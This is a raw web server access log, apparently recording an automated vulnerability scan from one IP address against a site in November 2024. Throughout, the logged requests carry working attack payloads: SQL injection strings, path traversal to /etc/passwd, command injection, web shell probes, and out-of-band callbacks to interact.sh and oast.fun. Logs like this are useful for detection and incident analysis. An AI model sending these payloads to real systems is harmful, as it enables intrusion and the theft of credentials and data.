195.164.49.69 - - [18/Nov/2024:23:41:18 +0000] POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:41:20 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:41:22 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:41:24 +0000] POST /template/aui/text-inline.vm HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:41:26 +0000] GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:41:29 +0000] GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:41:32 +0000] GET /api/v1/users HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:41:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:41:35 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:41:38 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:41:39 +0000] GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1 404 1153
195.164.49.69 - - [18/Nov/2024:23:41:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:41:43 +0000] POST /enrollment/ajax.php?action=login HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:41:48 +0000] GET /dfsms/add-category.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:41:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:41:54 +0000] GET /wp-admin/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:41:55 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:41:58 +0000] POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:42:05 +0000] GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:42:05 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:42:05 +0000] GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:42:05 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:42:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:09 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2p2nda4PjhhfHznKnvqIbjDPOgR HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:42:11 +0000] GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:42:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:18 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:42:20 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:42:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:24 +0000] GET /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:42:26 +0000] GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,5934b37af6f7480ae5911e754482ddd6,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:42:28 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:42:31 +0000] GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:42:33 +0000] GET /enrollment/index.php?page=home HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:42:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:39 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [18/Nov/2024:23:42:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:42:40 +0000] POST /api/ HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:42:41 +0000] POST /client/api?command=samlSso HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:42:45 +0000] GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:46 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:42:48 +0000] GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:42:49 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:42:53 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:42:55 +0000] GET /?p=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:42:57 +0000] POST /webtools/control/view/StatsSinceStart HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:23:42:59 +0000] GET /default.aspx HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:43:00 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:43:02 +0000] POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 404 1135
195.164.49.69 - - [18/Nov/2024:23:43:04 +0000] POST /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:43:07 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:43:08 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:43:10 +0000] PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:43:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:43:14 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:43:16 +0000] GET /login?login=lutron&password=lutron HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:43:18 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:43:20 +0000] GET /N0t4xist*~1*/a.aspx HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:43:23 +0000] POST /auth/createAdmin HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:43:29 +0000] GET /Ww52nK HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:43:33 +0000] POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:43:34 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:43:40 +0000] GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:43:42 +0000] GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:43:43 +0000] GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:43:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:43:53 +0000] POST /CDGServer3/NoticeAjax;Service HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:43:55 +0000] GET /vicidial/welcome.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:43:59 +0000] GET /wp-json/post-smtp/v1/get-log HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:44:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:44:04 +0000] GET /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:23:44:07 +0000] POST /ocpu/library/base/R/do.call/json HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:44:10 +0000] POST /Upload/upload_file.php?l=test HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:44:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:44:14 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:44:15 +0000] POST /process/aprocess.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:44:19 +0000] GET /*~1*/a.aspx HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:44:21 +0000] GET / HTTP/1.1 200 11204
- - - [18/Nov/2024:23:44:23 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:44:25 +0000] GET /include/config.properties HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:44:27 +0000] GET /heapdump HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:44:32 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:44:34 +0000] POST /webmail/basic/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:44:36 +0000] POST /ajax.php?action=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:44:38 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:44:40 +0000] POST /adminPage/remote/cmdOver HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:44:42 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:44:44 +0000] POST /3.0/authService/config HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:44:46 +0000] POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:44:47 +0000] POST /scrm/crm/admin HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:44:49 +0000] POST /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:23:44:52 +0000] POST /?s=index/index/index HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:44:55 +0000] GET /Upload/test/2p2ndPvqae7FrSDpKTd21zawkGp.php HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:44:58 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:45:00 +0000] POST /index.php?s=captcha HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:45:02 +0000] OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:23:45:04 +0000] POST /module/retrieve_pwd/header.inc.php HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:45:06 +0000] GET /2p2ndjFozcRQSc8bSgWVmolFmV0.txt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:45:10 +0000] POST /client.do HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:45:11 +0000] GET /actuator/heapdump HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:45:13 +0000] GET /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 404 1138
195.164.49.69 - - [18/Nov/2024:23:45:16 +0000] GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:45:17 +0000] GET /welcome.action HTTP/1.1 404 1088
- - - [18/Nov/2024:23:45:19 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:45:21 +0000] GET /index.php?page=home HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:45:22 +0000] POST /lcms/index.php HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:45:24 +0000] GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:45:26 +0000] GET /api/v1/serverinfo HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:45:28 +0000] GET /mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:45:30 +0000] GET /upload/abbbcbb.html HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:45:32 +0000] POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%e2%80%99%e2%80%99%26type%3d HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:45:36 +0000] GET /api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:45:38 +0000] GET /UserSelect/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:45:40 +0000] GET /lab.html?vpath=//interact.sh HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:45:42 +0000] OPTIONS /*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:23:45:45 +0000] GET /api/v1/devices HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:45:47 +0000] GET /installation/index.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:45:49 +0000] GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 404 1106
83.212.98.101 - - [18/Nov/2024:23:45:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:45:51 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:45:53 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:45:54 +0000] POST /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 404 1138
195.164.49.69 - - [18/Nov/2024:23:45:56 +0000] GET /../../../../../../../../../../../../windows/iis.log HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:45:57 +0000] GET /assets/../package.json HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:46:00 +0000] GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:46:02 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:46:04 +0000] GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:46:06 +0000] GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1 404 1172
195.164.49.69 - - [18/Nov/2024:23:46:08 +0000] GET /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:46:10 +0000] GET /modules/simpleimportproduct/send.php?phpinfo=1 HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:46:11 +0000] GET /cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:46:13 +0000] GET /' HTTP/1.1 404 1079
- - - [18/Nov/2024:23:46:15 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:46:17 +0000] GET /current_config/Sha1Account1 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:46:19 +0000] GET /../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:46:21 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/wxzB.css HTTP/1.1 404 1178
195.164.49.69 - - [18/Nov/2024:23:46:23 +0000] GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:46:25 +0000] GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:46:26 +0000] GET /SetupWizard.aspx/eqhHNZaFyY HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:46:28 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:46:30 +0000] GET /current_config/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:46:32 +0000] GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:23:46:34 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:46:36 +0000] GET /attachment/personal/_temp.php HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:46:38 +0000] GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:46:39 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:46:41 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:46:43 +0000] GET /?filename=../../../../../../etc/passwd&mphb_action=download HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:46:45 +0000] GET /modules/updateproducts/send.php?phpinfo=1 HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:46:47 +0000] GET /pods HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:46:49 +0000] GET /js/elfinder.min.js HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:46:51 +0000] GET /cgi-bin/logoff.cgi HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:46:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:46:55 +0000] GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1 200 11204
- - - [18/Nov/2024:23:46:56 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:46:58 +0000] GET /config/getuser?index=0 HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:47:00 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/DbmF.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:23:47:02 +0000] GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:47:04 +0000] GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:23:47:06 +0000] GET /perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4 HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:47:08 +0000] GET /rest/users/1/settings/ HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:47:09 +0000] GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1 404 1127
- - - [18/Nov/2024:23:47:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:47:13 +0000] GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:47:15 +0000] GET /admin/elfinder/elfinder-cke.html HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:47:17 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:23:47:19 +0000] GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:47:21 +0000] GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:47:23 +0000] GET /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:47:25 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:47:27 +0000] GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:47:28 +0000] GET /api/v1/pods HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:47:30 +0000] GET /js/elFinder.version.js HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:47:31 +0000] GET /api/get_device_details HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:47:34 +0000] GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type&e HTTP/1.1 404 1182
195.164.49.69 - - [18/Nov/2024:23:47:36 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:47:38 +0000] GET /?query=SHOW%20DATABASES HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:47:39 +0000] GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1127
83.212.98.101 - - [18/Nov/2024:23:47:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:47:41 +0000] GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:47:43 +0000] GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:23:47:45 +0000] GET /assets/elFinder/elfinder.html HTTP/1.1 404 1111
